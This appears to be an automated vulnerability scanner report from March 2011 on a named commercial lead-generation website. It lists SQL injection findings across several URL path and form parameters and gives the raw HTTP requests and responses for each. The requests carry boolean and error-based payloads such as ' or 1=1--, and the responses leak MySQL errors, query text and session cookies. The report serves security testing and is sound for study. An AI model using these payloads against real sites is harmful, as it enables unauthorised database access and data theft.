GET /ppc/leadflow/inco0010666913'%20or%201%3d1--%20/project.php?catId=60003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_475=3074__Corporation&attributeId_476_t=3&attributeId_477=3138__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone='&subcategoryId=60003&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=70s8jl3smcvrvp347ut5iiglg2; JSESSIONID=90ED5542F8D0357682DAE5A7AFA2F040; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:53:15 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47440
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www.insideup.com/ppc/leadflow/"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title> <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/> <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/> <link rel="stylesheet" href="css/newlanding_style.css" /> <link rel="stylesheet" href="style/dhtmlwindow.css" /> <link rel="stylesheet" href="css/ui.core.css" /> <link rel="stylesheet" href="css/Dyn_form_style.css" /> <script type="text/javascript" src='js/jquery.js'></script> <script type="text/javascript" src="js/ui.core.js"></script> <script type="text/javascript"> jQuery(document).ready(function() { jQuery("form").attr("autocomplete", "off"); }); var global_form_attribute = 8 </script>
<script language="javascript" src="js/dhtmlwindow.js"></script> <script language="javascript" src="js/modal.js"></script> <script type="text/javascript" src="js/application_js.js"></script> <link href="css/styles.css" rel="stylesheet" type="text/css" /> <script> function frmprompt(){ frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0') } function frmprompt02(){ frmwindow=dhtmlmodal.open('frmbox', 'd ...[SNIP]...
Request 2
GET /ppc/leadflow/inco0010666913'%20or%201%3d2--%20/project.php?catId=60003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_475=3074__Corporation&attributeId_476_t=3&attributeId_477=3138__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone='&subcategoryId=60003&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=70s8jl3smcvrvp347ut5iiglg2; JSESSIONID=90ED5542F8D0357682DAE5A7AFA2F040; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 01:53:36 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 125 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/inco0010666913' or 1=2-- /project.php was not found on this server.</p>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:44:24 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7438 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... (SELECT user)LIMIT 1),0x59),0,0x4E)),CHAR(95),CHAR(33),CHAR(64)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&phone=Phone&subcategoryId=60003&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=60003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting/Fina' at line 5
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:44:25 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7323 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]...
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 13115930'%20or%201%3d1--%20 and 13115930'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /ppc/leadflow/inco00/project.php13115930'%20or%201%3d1--%20?catId=60003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_475=3074__Corporation&attributeId_476_t=3&attributeId_477=3138__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone='&subcategoryId=60003&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=70s8jl3smcvrvp347ut5iiglg2; JSESSIONID=90ED5542F8D0357682DAE5A7AFA2F040; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:55:01 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47440
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www.insideup.com/ppc/leadflow/"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title> <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/> <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/> <link rel="stylesheet" href="css/newlanding_style.css" /> <link rel="stylesheet" href="style/dhtmlwindow.css" /> <link rel="stylesheet" href="css/ui.core.css" /> <link rel="stylesheet" href="css/Dyn_form_style.css" /> <script type="text/javascript" src='js/jquery.js'></script> <script type="text/javascript" src="js/ui.core.js"></script> <script type="text/javascript"> jQuery(document).ready(function() { jQuery("form").attr("autocomplete", "off"); }); var global_form_attribute = 8 </script>
<script language="javascript" src="js/dhtmlwindow.js"></script> <script language="javascript" src="js/modal.js"></script> <script type="text/javascript" src="js/application_js.js"></script> <link href="css/styles.css" rel="stylesheet" type="text/css" /> <script> function frmprompt(){ frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0') } function frmprompt02(){ frmwindow=dhtmlmodal.open('frmbox', 'd ...[SNIP]...
Request 2
GET /ppc/leadflow/inco00/project.php13115930'%20or%201%3d2--%20?catId=60003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_475=3074__Corporation&attributeId_476_t=3&attributeId_477=3138__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone='&subcategoryId=60003&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=70s8jl3smcvrvp347ut5iiglg2; JSESSIONID=90ED5542F8D0357682DAE5A7AFA2F040; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 01:55:11 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 125 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/inco00/project.php13115930' or 1=2-- was not found on this server.</p>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:44:28 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7438 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... (SELECT user)LIMIT 1),0x59),0,0x4E)),CHAR(95),CHAR(33),CHAR(64)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&phone=Phone&subcategoryId=60003&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=60003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting/Fina' at line 5
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:44:29 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7323 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]...
The address parameter appears to be vulnerable to SQL injection attacks. The payloads 13756426'%20or%201%3d1--%20 and 13756426'%20or%201%3d2--%20 were each submitted in the address parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:36:16 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=2m09ujognfb7rnefqu85scqqr2; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47440
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]... <title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title> <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/> <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/> <link rel="stylesheet" href="css/newlanding_style.css" /> <link rel="stylesheet" href="style/dhtmlwindow.css" /> <link rel="stylesheet" href="css/ui.core.css" /> <link rel="stylesheet" href="css/Dyn_form_style.css" /> <script type="text/javascript" src='js/jquery.js'></script> <script type="text/javascript" src="js/ui.core.js"></script> <script type="text/javascript"> jQuery(document).ready(function() { jQuery("form").attr("autocomplete", "off"); }); var global_form_attribute = 8 </script>
The address parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the address parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc&address=Address'&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_475=3074__Corporation&attributeId_476_t=3&attributeId_477=3138__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone='+OR+'1'%3d'1&subcategoryId=60003&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:38:08 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=u3cssvma5ssnbip7tdq3o2kso4; path=/ Content-Length: 5246 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... eId_476_t=3&attributeId_477=3138__Yes&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=' OR '1'='1&subcategoryId=60003&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=' OR '1'='' at line 5
Request 2
GET /ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc&address=Address''&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_475=3074__Corporation&attributeId_476_t=3&attributeId_477=3138__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone='+OR+'1'%3d'1&subcategoryId=60003&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:38:09 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=8g87jl7kqpbit0ca95thl3u6u1; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 41708
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The attributeId_342_g parameter appears to be vulnerable to SQL injection attacks. The payloads 10315083'%20or%201%3d1--%20 and 10315083'%20or%201%3d2--%20 were each submitted in the attributeId_342_g parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:37:05 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=07vpse2umkp91jug8puljprpd2; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47440
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]... <title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title> <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/> <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/> <link rel="stylesheet" href="css/newlanding_style.css" /> <link rel="stylesheet" href="style/dhtmlwindow.css" /> <link rel="stylesheet" href="css/ui.core.css" /> <link rel="stylesheet" href="css/Dyn_form_style.css" /> <script type="text/javascript" src='js/jquery.js'></script> <script type="text/javascript" src="js/ui.core.js"></script> <script type="text/javascript"> jQuery(document).ready(function() { jQuery("form").attr("autocomplete", "off"); }); var global_form_attribute = 8 </script>
The attributeId_342_g parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_342_g parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance'&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_475=3074__Corporation&attributeId_476_t=3&attributeId_477=3138__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone='+OR+'1'%3d'1&subcategoryId=60003&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:38:22 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=1s1avspaslebij9ge82hin80c2; path=/ Content-Length: 5246 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... eId_476_t=3&attributeId_477=3138__Yes&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=' OR '1'='1&subcategoryId=60003&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=' OR '1'='' at line 5
Request 2
GET /ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance''&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_475=3074__Corporation&attributeId_476_t=3&attributeId_477=3138__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone='+OR+'1'%3d'1&subcategoryId=60003&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:38:23 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=aq267e2sci81s1869l9ool1q77; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 41708
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
Report generation cancelled at Fri Mar 18 06:27:13 CDT 2011. 1635 issues were not reported.